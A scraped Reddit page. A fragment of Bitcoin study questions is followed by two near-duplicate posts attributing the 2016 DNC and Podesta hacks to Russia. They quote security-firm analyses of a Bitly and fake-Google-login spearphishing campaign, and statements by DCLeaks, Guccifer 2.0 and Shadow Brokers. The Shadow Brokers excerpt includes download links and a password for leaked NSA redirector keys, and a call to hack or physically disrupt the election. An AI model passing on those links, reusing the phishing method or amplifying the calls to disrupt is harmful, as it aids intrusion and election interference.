bits notation? Could you please describe in details how it works? What is the formula for the difficulty notation? 26. Why is difficulty adjustable? Who adjusts it and how exactly? Where is the adjustment made? On which node? How many blocks are taken into consideration to predict the next block issuance rate? What is the change limitation? Does the target difficulty depend on the number of transactions? 27. How is a new block propagated in the network? What kind of verification does each node do? What is the list of criteria for the new block? What kind of process ensures that the miners do not cheat? 28. How does a process of block assembly work? What are the sets of blocks each full node have? Could you please describe these sets of blocks? 29. What is a secondary chain? What does each node do to check this chain and perhaps to promote it to the primary chain? Could you please describe an example when a fork occurs and what happens? 30. How quickly forks are resolved most of the time? Within how many new block periods? 31. Why the next block is generated within 10 minutes from the previous? What is this compromise about? What do designers of the Bitcoin network thought about when implementing this rule? 32. What is a hashing race? How did Bitcoin hashing capacity has changed within years from inception? What kind of hardware devices were initially used and how did the HW utilization evolved? What kind of hardware is used now to do mining? How has the network difficulty improved? 33. What is the size of the field that stores nonce in the block header? What is the limitation and problem of the nonce? Why was an extra nonce created? Was there any intermediate solution? If yes, what was the solution? What are the limitations of the solution? 34. What is the exact solution for the extra nonce? Where does the new space come from? How much space is currently used and what is the range of the extra nonce now? 35. What is a mining pool? Why was it created? How are normally such pools operated? Do they pay regularly to the pool participants? Where are newly created Bitcoins distributed? To which address? How do mining pools make money? How do the mining pools calculate the participation? How are shares earned calculated? 36. What is a managed pool? How is the owner of the pool called? Do pool members need to run full nodes? Explain why or why not? 37. What are the most famous protocols used to coordinate pool activities? What is a block template? How is it used? 38. What is the limitation of a centralized pool? Is there any alternative? If yes, what is it? How is it called? How does it work? 39. What is a consensus attack? What is the main assumption of the Bitcoin network? What can be the targets of the consensus attacks? What can these attacks do and what they cannot do? How much overall capacity of the network do you have to control to exercise a consensus attack? Chapter 9: Alternative Chains, Currencies and Applications. 1. What is the name of alternative coins? Are they built on top of the Bitcoin network? What are examples of them? Is there any alternative approach? Could you please describe some alternatives? 2. Are there any alternatives to the PoW algorithm? If yes – what are the alternatives? Could you please name two or three? 3. What is the operation of the Script language that is used to store a metadata in Bitcoin blockchain? 4. What is a coloured coin? Could you please explain how it is created and how it works? Do you need any special SW to manage coloured coins? 5. What is the difference between alt coins and alt chains? What is a Litecoin? What are the major differences between the Bitcoin and Litecoin? Why so many alt coins have been created? What are they usually based on? 6. What is Scrypt? Where is it used and how is it different from the original algorithm from which it has been created? 7. What is a demurrage currency? Could you please give an example of one blockchain and crypto currency that is demurrage? 8. What is a good example of an alternative algorithm to PoW? What is it called and how is it different from the PoW? Why the alternatives to Bitcoin PoW have been created? What is the main reason for this? What is dual-purpose PoW algorithms? Why have they been created? 9. Is Bitcoin “anonymous” currency? Is it difficult to trace transactions and understand someone’s spending habits? 10. What is Ethereum? What kind of currency does it use? What is the difference from Bitcoin? Chapter 10: Bitcoin security. 1. What is the main approach of Bitcoin security? 2. What are two common mistakes made by newcomers to the world of Bitcoin? 3. What is a root of trust in traditional security settings? What is a root of trust in Bitcoin network? How should you assess security of your system? 4. What is a cold storage and paper wallet? 5. What is a hardware wallet? How is it better than storing private keys on your computer or your smart phone?
submitted by 5tu to BitcoinTechnology [link] [comments]

Thoughts on my culminating analysis of Russia's involvement in the U.S elections?

It has been a running theme lately that the U.S. government blaming Russia for the DNC/Podesta leaks is an attempt at deflection and is false. In the past few days, however, some very interesting pieces of information have come out from three different well-respected cybersecurity companies tasked with investigating the leaks or the groups behind these leaks. These companies are CrowsdStrike, Symantec, and SecureWorks. I think it is important that we cast away the media's non-technical analyses and go straight to the source.
The proof is that the hackers used Bitly to mask the malicious URL and trick people into thinking the URL was legitimate. They made two mistakes, however.
First, they accidentally left two of their Bitly accounts public, rather than setting them to private. This allowed security researchers to view some general account information, like what URLs were shortened and what they were changed to.
Second, they used Gmail's official numeric ID for each person inside of their maliciously crafted URLs. This allowed cybersecurity researchers to find out exactly who had been targeted.
The founder of CrowdStrike is a Russian-American and his company has been tasked with investigating the DNC/Podesta leaks. He blames Mother Russia. Relevant excerpts:
Alperovitch is the thirty-six-year-old cofounder of the cybersecurity firm CrowdStrike, and late the previous night, his company had been asked by the Democratic National Committee to investigate a possible breach of its network. A CrowdStrike security expert had sent the DNC a proprietary software package, called Falcon, that monitors the networks of its clients in real time. Falcon "lit up," the email said, within ten seconds of being installed at the DNC: Russia was in the network.
Alperovitch, a slight man with a sharp, quick demeanor, called the analyst who had emailed the report. "Are we sure it's Russia?" he asked.
The analyst said there was no doubt. Falcon had detected malicious software, or malware, that was stealing data and sending it to the same servers that had been used in a 2015 attack on the German Bundestag. The code and techniques used against the DNC resembled those from earlier attacks on the White House and the State Department. The analyst, a former intelligence officer, told Alperovitch that Falcon had identified not one but two Russian intruders: Cozy Bear, a group CrowdStrike's experts believed was affiliated with the FSB, Russia's answer to the CIA; and Fancy Bear, which they had linked to the GRU, Russian military intelligence.
Alperovitch then called Shawn Henry, a tall, bald fifty-four-year-old former executive assistant director at the FBI who is now CrowdStrike's president of services. Henry led a forensics team that retraced the hackers' steps and pieced together the pathology of the breach. Over the next two weeks, they learned that Cozy Bear had been stealing emails from the DNC for more than a year. Fancy Bear, on the other hand, had been in the network for only a few weeks. Its target was the DNC research department, specifically the material that the committee was compiling on Donald Trump and other Republicans. Meanwhile, a CrowdStrike group called the Overwatch team used Falcon to monitor the hackers, a process known as shoulder-surfing.
For the next two days, three CrowdStrike employees worked inside DNC headquarters, replacing the software and setting up new login credentials using what Alperovitch considers to be the most secure means of choosing a password: flipping through the dictionary at random. (After this article was posted online, Alperovitch noted that the passwords included random characters in addition to the words.) The Overwatch team kept an eye on Falcon to ensure there were no new intrusions. On Sunday night, once the operation was complete, Alperovitch took his team to celebrate at the Brazilian steakhouse Fogo de Chão.
...
Aperovitch's June 14 blog post garnered so much media attention that even its ebullient author felt slightly overwhelmed. Inevitably there were questions about the strange names his company had given the Russian hackers. As it happened, "Fancy Bear" and "Cozy Bear" were part of a coding system Alperovitch had created. Animals signified the hackers' country of origin: Russians were bears, Chinese were pandas, Iranians were kittens, and North Koreans were named for the chollima, a mythical winged horse. By company tradition, the analyst who discovers a new hacker gets to choose the first part of the nickname. Cozy Bear got its nickname because the letters coz appeared in its malware code. Fancy Bear, meanwhile, used malware that included the word Sofacy, which reminded the analyst who found it of the Iggy Azalea song "Fancy."
The day after the media maelstrom, the reporters were back with less friendly questions: Had Alperovitch gotten his facts right? Was he certain Russia was behind the DNC hacks? The doubts were prompted by the appearance of a blogger claiming to be from Eastern Europe who called himself Guccifer 2.0. Guccifer said that the breach was his, not Russia's. "DNC'S servers hacked by a lone hacker," he wrote in a blog post that included stolen files from the DNC. "I guess CrowdStrike customers should think twice about company's competence," Guccifer wrote. "Fuck CrowdStrike!!!!!!!!!"
an incorrect attribution in public. "Did we miss something?" he asked CrowdStrike's forensics team. Henry and his staff went back over the evidence, all of which supported their original conclusion.
Alperovitch had also never seen someone claim to be the only intruder on a site. "No hacker goes into the network and does a full forensic investigation," he told me. Being called out, he said, was "very shocking. It was clearly an attack on us as well as on the DNC."
Alperovitch initially thought that the leaks were standard espionage and that Guccifer's attacks on CrowdStrike were just a noisy reaction to being busted. "I thought, Okay, they got really upset that they were caught," he said. But after documents from the DNC continued to leak, Alperovitch decided the situation was far worse than that. He concluded that the Russians wanted to use the leaked files to manipulate U. S. voters—a first. "It hit me that, holy crap, this is an influence operation. They're actually trying to inject themselves into the election," he said. "I believe that we may very well wake up on the morning the day after the election and find statements from Russian adversaries saying, 'Do not trust the result.' "
...
Days later, Alperovitch got a call from a Reuters reporter asking whether the Democratic Congressional Campaign Committee had been hacked. CrowdStrike had, in fact, been working on a breach at the DCCC; once again, Alperovitch believed that Russia was responsible. Now, however, he suspected that only Fancy Bear was involved. A lawyer for the DCCC gave Alperovitch permission to confirm the leak and to name Russia as the suspected author.
Two weeks later, files from the DCCC began to appear on Guccifer 2.0's website. This time he released information about Democratic congressional candidates who were running close races in Florida, Ohio, Illinois, and Pennsylvania. On August 12, he went further, publishing a spreadsheet that included the personal email addresses and phone numbers of nearly two hundred Democratic members of Congress.
...
Alperovitch's friends in government told him privately that an official attribution so close to the election would look political. If the government named Russia, it would be accused of carrying water for Hillary Clinton. The explanations upset Alperovitch. The silence of the American government began to feel both familiar and dangerous. "It doesn't help us if two years from now someone gets indicted," he said. After Michelle Obama's passport was published online, on September 22, Alperovitch threw up his hands in exasperation. "That is Putin giving us the finger," he told me.
Source: The Russian Expat Leading the Fight to Protect America
The guy responsible for ousting Stuxnet as being an American/Israeli cyberworm (no friend of the U.S. government/establishment) also says that his company, Symantec, has found that Russia was responsible for the leaks:
It is pretty clear judging by the indicators of compromise [IOCs]. The binaries that were used to hack the DNC as well as Podesta’s email as well as some other Democratic campaign folks, those IOCs match binaries and also infrastructure that was used in attacks that were previously recorded by others as having Russian origin. That much we can confirm. So if you believe other people’s—primarily government’s—attribution that those previous attacks were Russian, then these attacks are definitely connected. We’re talking about the same binaries, the same tools, the same infrastructure.
We’ve analyzed the tools, the binaries, and the infrastructure that was used in the attack, and from that we can confirm that it’s connected to a group that has two names. One is Sofacy, or “Cozy Bear,” and The Dukes, which is also known as “Fancy Bear.” From the binary analysis point of view, I can tell you that the activities of these attackers have been during Russian working hours, either centered on UTC+3 or UTC+4; they don’t work Russian holidays; they work Monday to Friday; there are language identifiers inside that are Russian; when you look at all the victim profiles they would be in interest to the Russian nation-state. So all of that stuff fits the profile. Now, could all those things be false flags? Sure. Other government entities obviously have come out and said it is the Russian state, and the binary forensics would definitely match that.
There was another attack that happened in the Ukraine. So in December, in the Ukraine, all the power went out to about 260,000 households, or customers. They basically infiltrated the power company, got access to the machines that controlled the power, they flipped the computer switches off and shut down the power, and then they began to wipe all the machines and devices—overriding the hard drives and trashing the machines so that they couldn’t be started up again, or so that the switches couldn’t come on again. Ukrainians were able to get power back after six hours by switching to manual mode. They went off their computer monitor mode and physically flipped the switches to bring the power back up. What’s interesting about that case is the fact that they were more behind technologically actually helped them. Something very similar could easily happen in the U.S. and we’re much more beholden to computing infrastructure here, so our ability to switch to manual mode here would be much more difficult.
Is there linkage between the DNC and Podesta hacks and the 2014 State Department hacks that were also believed to be carried out by Russia?
Yeah, these are being conducted by the same groups. We know that from the IOCs—by looking at the tools they use and the infrastructure they use.
Many of these attacks were happening prior to the nomination of Trump. Based on that theory, people believe that there was a general plan for disruption, and it may be the case now that the easiest and best way to do so is in the manner you speak, but these attacks did not just start happening post-Trump’s nomination. So in that sense, there is a feeling that it’s not a very Trump-specific activity versus an election disruption activity. This is the easiest way for them to disrupt the election.
Source: Cybersecurity Expert: Proof Russia Behind DNC, Podesta Hacks
Another cybersecurity company, SecureWorks, has published some interesting blogposts about all this:
In mid-2015, CTU researchers discovered TG-4127 using the accoounts-google . com domain in spearphishing attacks targeting Google Account users. The domain was used in a phishing URL submitted to Phishtank, a website that allows users to report phishing links (see Figure 1).
Figure 1. Example of accoounts-google . com used in a phishing URL.
Recipients who clicked the link were presented with a fake Google Account login page (see Figure 2). The threat actors could use entered credentials to access the contents of the associated Gmail account.
Figure 2. Fake Google Account login page.
Encoded target details
Analysis of the phishing URL revealed that it includes two Base64-encoded values (see Figure 3). The decoded Base64 values (see Table 1) match the Gmail account and its associated Google Account username. If a target clicks the phishing link, the username field of the displayed fake Google Account login page is prepopulated with the individual’s email address.
Figure 3. Spearphishing URL.
Table 1. Decoded Base64 values from the phishing URL used by TG-4127.
Use of the Bitly URL-shortening service
A Bitly URL was uploaded to Phishtank at almost the same time as the original spearphishing URL (see Figure 4).
Figure 4. Bitly phishing URL submitted at same time as accoounts-google . com phishing URL.
Using a tool on Bitly’s website, CTU researchers determined that the Bitly URL redirected to the original phishing URL (see Figure 5). Analysis of activity associated with the Bitly account used to create the shortened URL revealed that it had been used to create more than 3,000 shortened links used to target more than 1,800 Google Accounts.
Figure 5. Link-shortener page for bit.ly/1PXQ8zP that reveals the full URL.
Target analysis
CTU researchers analyzed the Google Accounts targeted by TG-4127 to gain insight about the targets and the threat group’s intent.
Focus on Russia and former Soviet states
Most of the targeted accounts are linked to intelligence gathering or information control within Russia or former Soviet states. The majority of the activity appears to focus on Russia’s military involvement in eastern Ukraine; for example, the email address targeted by the most phishing attempts (nine) was linked to a spokesperson for the Ukrainian prime minister. Other targets included individuals in political, military, and diplomatic positions in former Soviet states, as well as journalists, human rights organizations, and regional advocacy groups in Russia.
Other targets worldwide
Analysis of targeted individuals outside of Russia and the former Soviet states revealed that they work in a wide range of industry verticals (see Figure 6). The groups can be divided into two broad categories:
TG-4127 likely targeted the groups in the first category because they criticized Russia. The groups in the second category may have information useful to the Russian government.
Figure 6. TG-4127 targeting outside of Russia and former Soviet states.
Authors and journalists
More than half (53%) of the targeted authors and journalists are Russia or Ukraine subject matter experts (see Figure 7). It is likely that the Russian state has an interest in how it is portrayed in the media. U.S.-based military spouses who wrote online content about the military and military families were also targeted. The threat actors may have been attempting to learn about broader military issues in the U.S., or gain operational insight into the military activity of the target’s spouse.
Figure 7. Subject matter expertise of authors and journalists targeted by TG-4127.
Government supply chain
CTU researchers identified individuals who were likely targeted due to their position within the supply chain of organizations of interest to TG-4127 (e.g., defense and government networks). Figure 8 shows the distribution by category. The targets included a systems engineer working on a military simulation tool, a consultant specializing in unmanned aerial systems, an IT security consultant working for NATO, and a director of federal sales for the security arm of a multinational technology company. The threat actors likely aimed to exploit the individuals’ access to and knowledge of government clients’ information.
Figure 8. Categories of supply chain targets.
Government / military personnel
TG-4127 likely targeted current and former military and government personnel for potential operational insight gained from access to their personal communications. Most of the activity focused on individuals based in the U.S. or working in NATO-linked roles (see Figure 9).
Figure 9. Nation or organization of government/military targets.
TG-4127 targeted high-profile Syrian rebel leaders, including a leader of the Syrian National Coalition. Russian forces have supported Syrian President Bashar al-Assad’s regime since September 2015, so it is likely the threat actors are seeking to gain intelligence on rebel forces to assist Russian and Assad regime military operations.
Success of the phishing campaign
CTU researchers analyzed 4,396 phishing URLs sent to 1,881 Google Accounts between March and September, 2015. More than half (59%) of the URLs were accessed, suggesting that the recipients at least opened the phishing page. From the available data, it is not possible to determine how many of those Google Accounts were compromised. Most of the targeted accounts received multiple phishing attempts, which may indicate that previous attempts had been unsuccessful. However, 35% of accounts that accessed the malicious link were not subject to additional attempts, possibly indicating that the compromise was successful.
Of the accounts targeted once, CTU researchers determined that 60% of the recipients clicked the malicious Bitly. Of the accounts that were targeted more than once, 57% of the recipients clicked the malicious link in the repeated attempts. These results likely encourage threat actors to make additional attempts if the initial phishing email is unsuccessful.
Source: Threat Group-4127 Targets Google Accounts
Here's another article by SecureWorks:
Spearphishing details
The short links in the spearphishing emails redirected victims to a TG-4127-controlled URL that spoofed a legitimate Google domain. A Base64-encoded string containing the victim's full email address is passed with this URL, prepopulating a fake Google login page displayed to the victim. If a victim enters their credentials, TG-4127 can establish a session with Google and access the victim's account. The threat actors may be able to keep this session alive and maintain persistent access.
Hillary for America
TG-4127 exploited the Hillary for America campaign's use of Gmail and leveraged campaign employees' expectation of the standard Gmail login page to access their email account. When presented with TG-4127's spoofed login page (see Figure 1), victims might be convinced it was the legitimate login page for their hillaryclinton.com email account.
Figure 1. Example of a TG-4127 fake Google Account login page.
CTU researchers observed the first short links targeting hillaryclinton.com email addresses being created in mid-March 2016; the last link was created in mid-May. During this period, TG-4127 created 213 short links targeting 108 email addresses on the hillaryclinton.com domain. Through open-source research, CTU researchers identified the owners of 66 of the targeted email addresses. There was no open-source footprint for the remaining 42 addresses, suggesting that TG-4127 acquired them from another source, possibly other intelligence activity.
The identified email owners held a wide range of responsibilities within the Hillary for America campaign, extending from senior figures to junior employees and the group mailboxes for various regional offices. Targeted senior figures managed communications and media affairs, policy, speech writing, finance, and travel, while junior figures arranged schedules and travel for Hillary Clinton's campaign trail. Targets held the following titles:
Publicly available Bitly data reveals how many of the short links were clicked, likely by a victim opening a spearphishing email and clicking the link to the fake Gmail login page. Only 20 of the 213 short links have been clicked as of this publication. Eleven of the links were clicked once, four were clicked twice, two were clicked three times, and two were clicked four times.
Democratic National Committee
CTU researchers do not have evidence that these spearphishing emails are connected to the DNC network compromise that was revealed on June 14. However, a coincidence seems unlikely, and CTU researchers suspect that TG-4127 used the spearphishing emails or similar techniques to gain an initial foothold in the DNC network.
Personal email accounts
CTU researchers identified TG-4127 targeting 26 personal gmail.com accounts belonging to individuals linked to the Hillary for America campaign, the DNC, or other aspects of U.S. national politics. Five of the individuals also had a hillaryclinton.com email account that was targeted by TG-4127. Many of these individuals held communications, media, finance, or policy roles. They include the director of speechwriting for Hillary for America and the deputy director office of the chair at the DNC. TG-4127 created 150 short links targeting this group. As of this publication, 40 of the links have been clicked at least once.
Related activity and implications
Although the 2015 campaign did not focus on individuals associated with U.S. politics, open-source evidence suggests that TG-4127 targeted individuals connected to the U.S. White House in early 2015. The threat group also reportedly targeted the German parliament and German Chancellor Angela Merkel's Christian Democratic Union party. CTU researchers have not observed TG-4127 use this technique (using Bitly short links) to target the U.S. Republican party or the other U.S. presidential candidates whose campaigns were active between mid-March and mid-May.
Source: Threat Group-4127 Targets Hillary Clinton Presidential Campaign
Read these two articles for more context:
How Hackers Broke Into John Podesta and Colin Powell’s Gmail Accounts
How Russia Pulled Off the Biggest Election Hack in U.S. History
Guccifer2.0, The Shadow Brokers, and DCLeaks, who have all leaked U.S. documents/cyberweapons, love talking about the "U.S. elite" and "corruption" in America, along with saying "the elections are rigged." I wonder why these people suddenly became so interested in the U.S. election?
Regardless, we know from the Bit.ly victim profiles that Podesta, the DNC, Ukrainian/Russian journalists, Bellingcat and other enemies of Russia were targeted by these groups. This also means that those targeted by DCLeaks and Guccifer2.0 were the same people, and that the aforementioned entities are actually one.
Why would they lie about being separate groups?
Lastly, I have gone through all the public statements made by these groups, by going through their TwitteTumblMedium/WordPress/web posts. Here are some of the comments made by DCLeaks, Guccifer2.0 and The Shadow Brokers. Tell me if you notice a common theme:
DCLeaks
Known for hacking the emails of former Secretary of State Colin Powell and former NATO General Breedlove, as well as Soros' OSF intranet documents.
George Soros is a Hungarian-American business magnate, investor, philanthropist, political activist and author who is of Hungarian-Jewish ancestry and holds dual citizenship. He drives more than 50 global and regional programs and foundations. Soros is named an architect and a sponsor of almost every revolution and coup around the world for the last 25 years. The USA is thought to be a vampire due to him and his puppets, not a lighthouse of freedom and democracy. His minions spill blood of millions and millions of people just to make him even more rich. Soros is an oligarch sponsoring the Democratic party, Hillary Clinton, hundreds of politicians all over the world. This website is designed to let everyone inside George Soros’ Open Society Foundation and related organisations. We present you the workplans, strategies, priorities and other activities of Soros. These documents shed light on one of the most influential network operating worldwide.
Source: http://soros.dcleaks.com
Welcome another cog in the U.S. political and military machine. CAPT Pistole's emails released
documents reveal the billionaire’s attempt to organize a “national movement” to create a federalized police force.
Looks like Clinton's staff doesn't care about security.Wonder from whom did they learn it..
FBI hq is a great place for club meeting especially when Clinton is under investigation
A further look at their Twitter account reveals that they mostly re-tweet WikiLeaks/RT/PressTV, hate Clinton, like Trump, love talking about the email scandal, post conspiracy theories about Mark Zuckerberg, exclusively target Russia's enemies (like former NATO General Breedlove, Soros, Colin Powell, etc,.), defend Russia from being attacked, and have a penchant for focusing on news portraying the U.S. elections/debates as "rigged":
Check the private correspondence between Philip Breedlove and Harlan Ullman
Check restricted documents of George Soros’ Open Society Foundation
Check restricted documents leaked from Hillary Clinton's presidential campaign staff
Emails show Obama saw US involvement in Russia talks as a 'threat'
'Gen. plotted against Obama on Russia'
Check George Soros's OSF plans to counter Russian policy and traditional values
Check Soros internal files
A New McCarthyism: @ggreenwald on Clinton Camp's Attempts to Link @wikileaks, Trump & @DrJillStein to Russia
Source: https://twitter.com/dcleaks_
Guccifer 2.0
Known for hacking the DNC and DCCC.
Together we’ll be able to throw off the political elite, the rich clans that exploit the world!
Fuck the lies and conspirators like DNC!!!
Who inspires me? Not the guys like Rambo or Terminator or any other like them. The world has changed. Assange, Snowden, and Manning are the heroes of the computer age. They struggle for truth and justice; they struggle to make our world better, more honest and clear. People like them make us hope for tomorrow. They are the modern heroes, they make history right now.
Marcel Lazar is another hero of mine. He inspired me and showed me the way. He proved that even the powers that be have weak points.
Anyway it seems that IT-companies and special services can’t realize that people like me act just following their ideas but not for money. They missed the bus with Assange and Snowden, they are not ready to live in the modern world. They are not ready to meet people who are smart and brave, who are eager to fight for their ideals, who can sacrifice themselves for the better future. Working for a boss makes them slow I suppose. Do you need more proof?
don’t want to disappoint anyone, but none of the candidates has my sympathies. Each of them has skeletons in the closet and I think people have a right to know the truth about the politicians.
As for me, I see great differences between Hillary Clinton and Donald Trump. Hillary seems so much false to me, she got all her money from political activities and lobbying, she is a slave of moguls, she is bought and sold. She never had to work hard and never risked everything she had. Her words don’t meet her actions. And her collusion with the DNC turned the primaries into farce.
Opposite to her, Donald Trump has earned his money himself. And at least he is sincere in what he says. His position is straight and clear.
Anyway that doesn’t mean that I support him. I’m totally against his ideas about closing borders and deportation policy. It’s a nonsense, absolute bullshit.
I have nothing to say about Bernie Sanders. It seems he never had a chance to win the nomination as the Democratic Party itself stood against him!
Here are the DCCC docs on Florida: reports, memos, briefings, dossiers, etc. You can have a look at who you are going to elect now. It may seem the congressional primaries are also becoming a farce.
As you can see, the private server of the Clinton clan contains docs and donors lists of the Democratic committees, PACs, etc. Does it surprise you?
It looks like big banks and corporations agreed to donate to the Democrats a certain percentage of the allocated TARP funds.
I found out something interesting in emails between DNC employees and Hillary Clinton campaign staff. Democrats prepare a new provocation against Trump. After Trump sent his financial report in May it appeared on DNC servers at once. DNC rushed to analyze it and asked the Jones Mandel company to make an effective investigation. I won’t be surprised if some mainstream media like the New York Times or CNN publish soon Trump’s financial docs. No doubt who could give them.
I’d like to warn you that the Democrats may rig the elections on November 8. This may be possible because of the software installed in the FEC networks by the large IT companies.
As I’ve already said, their software is of poor quality, with many holes and vulnerabilities.
I have registered in the FEC electronic system as an independent election observer; so I will monitor that the elections are held honestly.
I also call on other hackers to join me, monitor the elections from inside and inform the U.S. society about the facts of electoral fraud.
Source: https://guccifer2.wordpress.com
Here and here he claims that he's the source of WikiLeaks' DNC documents.
He frequently re-tweets WikiLeaks, just like DCLeaks. He re-tweets and follows conspiracy theory outlets like Alex Jones and Roger Stone, just like DCLeaks followed RT and PressTV. Of course, he sprang back to life two days before Election Day, to complain about "Democrats rigging the election." I thought he didn't favour any political party?
Source: https://twitter.com/GUCCIFER_2
The Shadow Brokers
Known for leaking the NSA's elite hacking entity's, Equation Group's, cyberweapons.
!! Attention Wealthy Elites !!!
We have final message for “Wealthy Elites”. We know what is wealthy but what is Elites? Elites is making laws protect self and friends, lie and fuck other peoples. Elites is breaking laws, regular peoples go to jail, life ruin, family ruin, but not Elites. Elites is breaking laws, many peoples know Elites guilty, Elites call top friends at law enforcement and government agencies, offer bribes, make promise future handjobs, (but no blowjobs). Elites top friends announce, no law broken, no crime commit. Reporters (not call journalist) make living say write only nice things about Elites, convince dumb cattle, is just politics, everything is awesome, check out our ads and our prostitutes. Then Elites runs for president. Why run for president when already control country like dictatorship? What this have do with fun Cyber Weapons Auction? We want make sure Wealthy Elite recognizes the danger cyber weapons, this message, our auction, poses to their wealth and control. Let us spell out for Elites. Your wealth and control depends on electronic data. You see what “Equation Group” can do. You see what cryptolockers and stuxnet can do. You see free files we give for free. You see attacks on banks and SWIFT in news. Maybe there is Equation Group version of cryptolocker+stuxnet for banks and financial systems? If Equation Group lose control of cyber weapons, who else lose or find cyber weapons? If electronic data go bye bye where leave Wealthy Elites? Maybe with dumb cattle? “Do you feel in charge?” Wealthy Elites, you send bitcoins, you bid in auction, maybe big advantage for you?
Source: https://archive.is/WkT7o#selection-337.0-341.1595
TheShadowBrokers is having special trick or treat for Amerikanskis tonight. But first questions.
Why is DirtyGrandpa threating CIA cyberwar with Russia? Why not threating with NSA or CyberCommand? CIA is cyber B-Team, yes? Where is cyber A-Team? Maybe threating is not being for external propaganda? Maybe is being for internal propaganda? Oldest control trick in book, yes? Waving flag, blaming problems on external sources, not taking responsibility for failures. But neverminding, hacking DNC is way way most important than EquationGroup losing capabilities. Amerikanskis is not knowing USSA cyber capabilities is being screwed? Where is being “free press”? Is ABC, NBC, CBS, FOX negligent in duties of informing Amerikanskis? Guessing “Free Press” is not being “Free as in free beer” or “Free as in free of government influence?
Let us be speaking regarding corruption. If Peoples#1 is having $1.00 and Peoples#2 is having $1000.00 which peoples is having more money? Which peoples is having more spending power? Voter$1 is giving $1 to politician and Voter$1000 is giving $1000 to politician, which voters is having more political power? Is both voters having equal political power? “one person, one vote”? Politicians, lobbyist, media, even SCOTUS (supreme court) is saying this is being true, money is not corrupting. In binary world, maybe. But world is not being binary, is it? What about peoples#3, VoterUndecided? VoterUndecided is giving no moneys and no votes. Politician is needing money for campaign to buy advertising, positive media stories, advisors, pollsters, operatives to be making VoterUndecided vote for politician. Political fundrasing, now which voter is having more political power? VoterUndecided votes for politician and politician wins. Re-election is coming. Government budget decision is required. Voter$1 is wanting politician to be spending taxes on education for making children into great thinkers, leaders, scientists. Voter$1000 is shareholder of defense & intelligence company is wanting politician spending taxes on spying and war to be making benefit self, for great profit. Political favors, now, which voter is having more political power? Did theshadowbrokers lose Amerikanskis? Amerikanskis is still thinking “one person, one vote”? Money isn’t corrupting elections, politics, govenments?
USSA elections is coming! 60% of Amerikansky never voting. Best scenario is meaning half of remaining red or blue fanatics or 20% of the most fanatical is picking USSA government? A great power. A free country. A good-doer. TheShadowBrokers is having suggestion. On November 8th, instead of not voting, maybe be stopping the vote all together? Maybe being grinch who stopped election from coming? Maybe hacking election is being the best idea? #hackelection2016. If peoples is not being hackers, then #disruptelection2016, #disruptcorruption2016. Maybe peoples not be going to work, be finding local polling places and protesting, blocking , disrupting , smashing equipment, tearing up ballots? The wealthy elites is being weakest during elections and transition of power. Is being why USSA is targeting elections in foreign countries. Don’t beleiving? Remembering Iran elections? Rembering stuxnet? Maybe is not Russia hacking election, maybe is being payback from Iran?
Ok peoples theshadowbrokers is promising you a trick or treating, here it is
https://mega.nz/#F!D1Q2EQpD!Lb09shM5XMZsQ_5_E1l4eQ https://yadi.sk/d/NCEyJQsBxrQxz
Password = payus
This is being equation group pitchimpair (redirector) keys, many missions into your networks is/was coming from these ip addresses. Is being unfortunate no peoples is already owning eqgrp_auction_file. Auction file is having tools for to making connect to these pitchimpairs. Maybe tools no more installed? Maybe is being cleaned up? To peoples is being owner of pitchimpair computers, don’t be looking for files, rootkit will self destruct. Be making cold forensic image. @GCHQ @Belgacom TheShadowBrokers is making special effort not to using foul language, bigotry, or making any funny. Be seeing if NBC, ABC, CBS, FOX is making stories about now? Maybe political hacks is being more important?
How bad do you want it to get? When you are ready to make the bleeding stop, payus, so we can move onto the next game. The game where you try to catch us cashing out! Swag us out!
Source: https://medium.com/@shadowbrokerss/message-5-trick-or-treat-e43f946f93e6#.9cfljtkx3
Again, the usual old spiel of brave hackers fighting "USSA"/"Amerikansky" "corruption". It's gotten quite repetitive by now.
Bizarrely, they began posting Bill Clinton and Lorreta Lynch erotic fan fiction at some point:
https://medium.com/@shadowbrokerss/begin-pgp-signed-message-hash-sha1-2a9aa03838a4#.896d0iqpi
submitted by MangekyouSharinganKa to AskTrumpSupporters [link] [comments]

Culminating Analysis of DNC/DCCC/Soros/Colin-Powell/NATO-General-Breedlove/NSA-Equation-Group/Podesta Leaks and Hacks

It has been a running theme lately that the U.S. government blaming Russia for the DNC/Podesta leaks is an attempt at deflection and is false. In the past few days, however, some very interesting pieces of information have come out from three different well-respected cybersecurity companies tasked with investigating the leaks or the groups behind these leaks. These companies are CrowsdStrike, Symantec, and SecureWorks. I think it is important that we cast away the media's non-technical analyses and go straight to the source.
The founder of CrowdStrike is a Russian-American and his company has been tasked with investigating the DNC/Podesta leaks. He blames Mother Russia. Relevant excerpts:
At six o'clock on the morning of May 6, Dmitri Alperovitch woke up in a Los Angeles hotel to an alarming email. Alperovitch is the thirty-six-year-old cofounder of the cybersecurity firm CrowdStrike, and late the previous night, his company had been asked by the Democratic National Committee to investigate a possible breach of its network. A CrowdStrike security expert had sent the DNC a proprietary software package, called Falcon, that monitors the networks of its clients in real time. Falcon "lit up," the email said, within ten seconds of being installed at the DNC: Russia was in the network.
Alperovitch, a slight man with a sharp, quick demeanor, called the analyst who had emailed the report. "Are we sure it's Russia?" he asked.
The analyst said there was no doubt. Falcon had detected malicious software, or malware, that was stealing data and sending it to the same servers that had been used in a 2015 attack on the German Bundestag. The code and techniques used against the DNC resembled those from earlier attacks on the White House and the State Department. The analyst, a former intelligence officer, told Alperovitch that Falcon had identified not one but two Russian intruders: Cozy Bear, a group CrowdStrike's experts believed was affiliated with the FSB, Russia's answer to the CIA; and Fancy Bear, which they had linked to the GRU, Russian military intelligence.
Alperovitch then called Shawn Henry, a tall, bald fifty-four-year-old former executive assistant director at the FBI who is now CrowdStrike's president of services. Henry led a forensics team that retraced the hackers' steps and pieced together the pathology of the breach. Over the next two weeks, they learned that Cozy Bear had been stealing emails from the DNC for more than a year. Fancy Bear, on the other hand, had been in the network for only a few weeks. Its target was the DNC research department, specifically the material that the committee was compiling on Donald Trump and other Republicans. Meanwhile, a CrowdStrike group called the Overwatch team used Falcon to monitor the hackers, a process known as shoulder-surfing.
Ultimately, the teams decided it was necessary to replace the software on every computer at the DNC. Until the network was clean, secrecy was vital. On the afternoon of Friday, June 10, all DNC employees were instructed to leave their laptops in the office. Alperovitch told me that a few people worried that Hillary Clinton, the presumptive Democratic nominee, was clearing house. "Those poor people thought they were getting fired," he says.
